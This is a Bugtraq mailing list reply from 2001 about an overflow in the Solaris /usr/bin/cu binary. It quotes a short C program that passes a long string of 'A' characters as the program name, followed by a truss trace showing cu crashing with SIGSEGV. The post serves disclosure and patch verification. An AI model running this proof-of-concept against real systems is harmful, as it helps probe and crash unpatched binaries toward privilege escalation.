Bugtraq mailing list archives
Re: Solaris /usr/bin/cu Vulnerability
From: Dan Harkless <dan-bugtraq () DILVISH SPEED NET>
Date: Tue, 30 Jan 2001 21:18:32 -0800
optyx <optyx () UBERHAX0R NET> writes:
Dan Harkless <dan-bugtraq () DILVISH SPEED NET> wrote:Are you implying the above patches fix the cu long hardlink name vulnerability? This is not the case, at least on 2.6: # cat > cu_exploit.c #include <stdio.h> void main(int argc,char **argv) { char *buf; buf = (char *) malloc(atoi(argv[1])*sizeof(char)); memset(buf,0x41,atoi(argv[1])-1); buf[atoi(argv[1])-1]=0; execl("/usr/bin/cu",buf,(char *)0); } # gcc cu_exploit.c cu_exploit.c: In function `main': cu_exploit.c:4: warning: return type of `main' is not `int' # a.out Segmentation faultsee that atoi(argv[1])? a.out crashed not /usr/bin/cu. try a.out 4000 or whatever number next time, or trace through it with gdb.
Right, sorry. I had the 4000 (actually 40000 -- didn't crash with only
4000) in there when I was running it originally but forgot to include it in
my proof-of-concept session. Here's the correct version (ellipsis in the
Usage and \-line-wrapping mine):
# a.out 4000
Usage: AAA[...]AAA [-dhtnLC] [-c device] [-s speed] [-l line] [-b 7|8]
[-o | -e] telno | systemname [local-cmd]
# a.out 40000
Segmentation Fault
# truss a.out 40000
execve("./a.out", 0xEFFFFC98, 0xEFFFFCA4) argc = 2
open("/dev/zero", O_RDONLY) = 3
mmap(0x00000000, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE, 3,\
0) = 0xEF7B0000
stat("a.out", 0xEFFFF998) = 0
open("/var/ld/ld.config", O_RDONLY) Err#2 ENOENT
open("/usr/local/lib/libc.so.1", O_RDONLY) Err#2 ENOENT
open("/usr/lib/libc.so.1", O_RDONLY) = 4
fstat(4, 0xEFFFF734) = 0
mmap(0x00000000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) =\
0xEF7A0000
mmap(0x00000000, 704512, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) =\
0xEF6C0000
mmap(0xEF763000, 25888, PROT_READ|PROT_WRITE|PROT_EXEC,\
MAP_PRIVATE|MAP_FIXED, 4, 602112) = 0xEF763000
mmap(0xEF76A000, 4144, PROT_READ|PROT_WRITE|PROT_EXEC,\
MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xEF76A000
munmap(0xEF754000, 61440) = 0
memcntl(0xEF6C0000, 101660, MC_ADVISE, 0x0003, 0, 0) = 0
close(4) = 0
open("/usr/local/lib/libdl.so.1", O_RDONLY) Err#2 ENOENT
open("/usr/lib/libdl.so.1", O_RDONLY) = 4
fstat(4, 0xEFFFF734) = 0
mmap(0xEF7A0000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 4, 0)\
= 0xEF7A0000
close(4) = 0
open("/usr/platform/SUNW,SPARCstation-5/lib/libc_psr.so.1", O_RDONLY)\
Err#2 ENOENT
close(3) = 0
brk(0x00020BA0) = 0
brk(0x0002ABA0) = 0
execve("/usr/bin/cu", 0xEFFFFBB8, 0xEFFFFCB0) argc = 1
open("/dev/zero", O_RDONLY) = 3
mmap(0x00000000, 40960, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE, 3,\
0) = 0xEF7B0000
stat("/usr/bin/cu", 0xEFFF5D60) = 0
open("/var/ld/ld.config", O_RDONLY) Err#2 ENOENT
mmap(0x00000000, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE, 3,\
0) = 0xEF7A0000
open("/usr/local/lib/libnsl.so.1", O_RDONLY) Err#2 ENOENT
open("/usr/lib/libnsl.so.1", O_RDONLY) = 4
fstat(4, 0xEFFF5AFC) = 0
mmap(0x00000000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) =\
0xEF790000
mmap(0x00000000, 581632, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) =\
0xEF700000
mmap(0xEF780000, 32812, PROT_READ|PROT_WRITE|PROT_EXEC,\
MAP_PRIVATE|MAP_FIXED, 4, 458752) = 0xEF780000
mmap(0xEF789000, 19976, PROT_READ|PROT_WRITE|PROT_EXEC,\
MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xEF789000
munmap(0xEF771000, 61440) = 0
memcntl(0xEF700000, 70140, MC_ADVISE, 0x0003, 0, 0) = 0
close(4) = 0
open("/usr/local/lib/libsocket.so.1", O_RDONLY) Err#2 ENOENT
open("/usr/lib/libsocket.so.1", O_RDONLY) = 4
fstat(4, 0xEFFF5AFC) = 0
mmap(0xEF790000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 4, 0)\
= 0xEF790000
mmap(0x00000000, 102400, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) =\
0xEF6E0000
mmap(0xEF6F7000, 4089, PROT_READ|PROT_WRITE|PROT_EXEC,\
MAP_PRIVATE|MAP_FIXED, 4, 28672) = 0xEF6F7000
mmap(0xEF6F8000, 388, PROT_READ|PROT_WRITE|PROT_EXEC,\
MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xEF6F8000
munmap(0xEF6E8000, 61440) = 0
memcntl(0xEF6E0000, 12072, MC_ADVISE, 0x0003, 0, 0) = 0
close(4) = 0
open("/usr/local/lib/libc.so.1", O_RDONLY) Err#2 ENOENT
open("/usr/lib/libc.so.1", O_RDONLY) = 4
fstat(4, 0xEFFF5AFC) = 0
mmap(0xEF790000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 4, 0)\
= 0xEF790000
mmap(0x00000000, 704512, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) =\
0xEF600000
mmap(0xEF6A3000, 25888, PROT_READ|PROT_WRITE|PROT_EXEC,\
MAP_PRIVATE|MAP_FIXED, 4, 602112) = 0xEF6A3000
mmap(0xEF6AA000, 4144, PROT_READ|PROT_WRITE|PROT_EXEC,\
MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xEF6AA000
munmap(0xEF694000, 61440) = 0
memcntl(0xEF600000, 101660, MC_ADVISE, 0x0003, 0, 0) = 0
close(4) = 0
open("/usr/local/lib/libdl.so.1", O_RDONLY) Err#2 ENOENT
open("/usr/lib/libdl.so.1", O_RDONLY) = 4
fstat(4, 0xEFFF5AFC) = 0
mmap(0xEF790000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 4, 0)\
= 0xEF790000
close(4) = 0
open("/usr/local/lib/libmp.so.2", O_RDONLY) Err#2 ENOENT
open("/usr/lib/libmp.so.2", O_RDONLY) = 4
fstat(4, 0xEFFF5AFC) = 0
mmap(0x00000000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0xEF6D0000
mmap(0x00000000, 77824, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) =\
0xEF5E0000
mmap(0xEF5F2000, 3581, PROT_READ|PROT_WRITE|PROT_EXEC,\
MAP_PRIVATE|MAP_FIXED, 4, 8192) = 0xEF5F2000
munmap(0xEF5E3000, 61440) = 0
memcntl(0xEF5E0000, 3020, MC_ADVISE, 0x0003, 0, 0) = 0
close(4) = 0
mmap(0x00000000, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE, 3,\
0) = 0xEF6C0000
open("/usr/platform/SUNW,SPARCstation-5/lib/libc_psr.so.1", O_RDONLY)\
Err#2 ENOENT
close(3) = 0
munmap(0xEF6D0000, 4096) = 0
Incurred fault #6, FLTBOUNDS %pc = 0xEF624694
siginfo: SIGSEGV SEGV_MAPERR addr=0x00038000
Received signal #11, SIGSEGV [default]
siginfo: SIGSEGV SEGV_MAPERR addr=0x00038000
*** process killed ***
As you can see, exec() has passed control over to /usr/bin/cu when we seg
fault.
----------------------------------------------------------------------
Dan Harkless | To prevent SPAM contamination, please
dan-bugtraq () dilvish speed net | do not mention this private email
SpeedGate Communications, Inc. | address in Usenet posts. Thank you.
Current thread:
- Solaris /usr/bin/cu Vulnerability Pablo Sor (Jan 18)
- Re: Solaris /usr/bin/cu Vulnerability Tomas Cibulka (Jan 18)
- Re: Solaris /usr/bin/cu Vulnerability Juergen P. Meier (Jan 19)
- Re: Solaris /usr/bin/cu Vulnerability Casper Dik (Jan 22)
- Re: Solaris /usr/bin/cu Vulnerability Juergen P. Meier (Jan 19)
- Solaris /usr/bin/cu Vulnerability hal King (Jan 23)
- Re: Solaris /usr/bin/cu Vulnerability Dan Harkless (Jan 30)
- <Possible follow-ups>
- Re: Solaris /usr/bin/cu Vulnerability Konrad Rieck (Jan 19)
- Re: Solaris /usr/bin/cu Vulnerability Michael H. Warfield (Jan 19)
- Re: Solaris /usr/bin/cu Vulnerability Wietse Venema (Jan 22)
- Re: Solaris /usr/bin/cu Vulnerability Michael H. Warfield (Jan 19)
- Re: Solaris /usr/bin/cu Vulnerability optyx (Jan 30)
- Re: Solaris /usr/bin/cu Vulnerability Dan Harkless (Jan 31)
- Re: Solaris /usr/bin/cu Vulnerability Tomas Cibulka (Jan 18)